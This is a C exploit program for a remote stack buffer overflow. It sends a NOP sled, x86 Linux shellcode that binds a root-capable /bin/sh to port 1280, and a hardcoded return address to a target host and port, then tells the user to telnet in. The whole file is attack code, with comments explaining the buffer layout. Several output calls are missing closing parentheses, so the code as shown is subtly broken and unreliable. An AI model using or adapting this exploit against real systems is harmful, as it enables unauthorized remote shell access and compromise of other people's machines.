#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#define OFFSET 522 /* buffer + %ebp + %eip = 514 + 4 + 4 = 522 */

/* shellcode - binds a shell on port 1280, followed by NOP padding and the
return address \xe0\xf9\xff\xbf */

/* Payload copied into the tail of the buffer built in main(). It is defined
   from a string literal, so sizeof(shellcode_ret) also counts the trailing
   NUL byte; main() uses that sizeof value both for the NOP fill length and
   for the memcpy length. */
char shellcode_ret[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\xb1\x06\x51\xb1\x01"
"\x51\xb1\x02\x51\x8d\x0c\x24\xcd\x80\xb3\x02\xb1\x02\x31\xc9\x51\x51\x51"
"\x80\xc1\x05\x66\x51\xb1\x02\x66\x51\x8d\x0c\x24\xb2\x10\x52\x51\x50\x8d"
"\x0c\x24\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3\x01\x53\x52\x8d\x0c\x24\x31"
"\xc0\xb0\x66\x80\xc3\x03\xcd\x80\x31\xc0\x50\x50\x52\x8d\x0c\x24\xb3\x05"
"\xb0\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0"
"\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\xeb\x18\x5e\x89\x75\x08\x31\xc0"
"\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
"\xe8\xe3\xff\xff\xff/bin/sh\x90\x90\x90\x90\xe0\xf9\xff\xbf";

int main(int argc, char *argv[]) {
/*
 * Builds a fixed OFFSET-byte buffer (0x90 fill followed by shellcode_ret),
 * opens a TCP connection to argv[1] on port argv[2] and sends the whole
 * buffer in a single send() call.
 *
 * Returns -1 on a usage error or on any resolve/socket/connect/send failure.
 * On the success path control falls off the end of main without an explicit
 * return statement.
 */
char buffer[OFFSET]; /* buffer to fill */
int s, i, size;
struct sockaddr_in yeah; /* never zeroed: only three members are assigned below */
struct hostent *host;

if(argc != 3) {
puts("[~] Remote buffer overflow";
printf("[~] Usage: %s host port\n", argv[0]);
return -1;
}

/* fill the leading part of the buffer with NOP (0x90) bytes; the comparison
   mixes int i with a size_t bound, so i is converted to unsigned here */
for(i=0;i<(OFFSET-sizeof(shellcode_ret));i++) buffer[i] = 0x90;

/* copy the shellcode (its trailing NUL included, since sizeof counts it) into
   the tail of the buffer */
memcpy(buffer+OFFSET-sizeof(shellcode_ret) , shellcode_ret,
sizeof(shellcode_ret));

host=gethostbyname(argv[1]); /* resolve the host name */

if (host==NULL)
{
fprintf(stderr, "[!] Gethostbyname failled\n";
return -1;
}

s = socket(AF_INET, SOCK_STREAM, 0); /* create the socket */

if (s < 0)
{
fprintf(stderr, "[!] Erreur lors de la cration de la socket\n";
return -1;
}

/* connection parameters: first resolved address, port taken from argv[2];
   atoi() reports no parse error, so a non-numeric port silently becomes 0 */
yeah.sin_family = AF_INET;
yeah.sin_addr = *((struct in_addr *)host->h_addr);
yeah.sin_port = htons(atoi(argv[2]));

if (connect(s, (struct sockaddr *)&yeah, sizeof(yeah))==-1) /* connect */
{
close(s);
fprintf(stderr, "[!] Erreur lors de la tentative de connexion\n";
return -1;
}

/* send the buffer; only a -1 return is treated as failure, a short send
   (size < sizeof(buffer)) is reported as success */
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1)
{
close(s);
fprintf(stderr, "[!] Foo! Exploit failled \n";
return -1;
}else{
fprintf(stdout, "[!] Exploit success! telnet %s 1280 !\n",argv[1]);
}
close(s); /* close the socket */
}